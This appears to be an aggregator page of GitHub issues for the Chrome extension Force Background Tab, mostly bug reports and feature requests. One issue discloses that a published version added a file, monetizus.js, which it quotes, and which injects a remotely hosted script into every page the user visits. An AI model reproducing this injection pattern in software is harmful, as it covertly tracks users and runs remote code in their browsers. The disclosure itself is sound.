Git Product home page Git Product logo

chromeextension-forcebackgroundtab's People

Contributors

monque avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar

chromeextension-forcebackgroundtab's Issues

not working on Ubuntu?

Pretty sure this was working, but now isnt.

I also tried ctrl+shift+click and middle-click, and neither worked. So maybe its something with the Ubuntu version of Chrome.

Chrome focuses on the tab opener.

Instead of focusing on the opened tab. With this addon, it now focuses on the tab that opened the new tab. Which is not a problem is most cases.
However, the whole reason I wanted to use this addon is because I have a script that opens and closes tabs at all time. So this addon does NOT open the new tab completely in the background. It more like switches back to the original tab.

Is there a way around this?

Link Grabber

Hi,

Can you please add this to the exception list: chrome-extension://
It's messing up the Link Grabber extension.

Thank you.

Control foreground/background with URL flag

I really like your plugin, and I'm considering using it to solve a problem I have on my website where I want some links to go to the background but some to go to the foreground.

It would be awesome if there was something we could include in the URL which was recognized by the plugin to divert control to either foreground or background as indicated.

Chrome extension is now tracking every site you visit

I don't know if you still have access to the extensionpage of the Chrome webstore but the "Force Background Tab" is now adding a JS tracking code to every site you visit.

Testing site: https://api.ipify.org/

Example with extension enabled:

https://i.imgur.com/4xX8x5W.png

Extension disabled:

https://i.imgur.com/pugQOrr.png

https://chrome.google.com/webstore/detail/force-background-tab/gidlfommnbibbmegmgajdbikelkdcmcl

The following file was added:

monetizus.js

(function(){
    var s = document.createElement('script'); 
    s.src = '//s3.amazonaws.com/jscache/1024f4c4a4bda17245.js'; 
    document.body.appendChild(s); 
})();

But if you have done it yourself you probably know that.

Request: add domain-filter

Hi,
can you add a domain-filter so the ForceBackground works only on some domains?

I use for example a rss-feed-collector and want to open some of the articles in the background while I step through them. There are HotKeys for stepping and open an article-link, so I cannot just use Crtl-mouse.
I would be very handy to use the extension but I don't want this behaviour on every page.

Background misspelled

There is a typo ('Backgrond') on the Default/Background toggle on the options page.

image

Use from scripts

I realize the possible security problems but if possible I could use the ability to set the option from a script. Or the ability to override the option such that I can use JavaScript to open a new tab in the background when the option is off (set for default).

If someone can figure out how to change the option from a separate script then the security issue already exists. I tried looking at the source code; I might try harder in the future.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.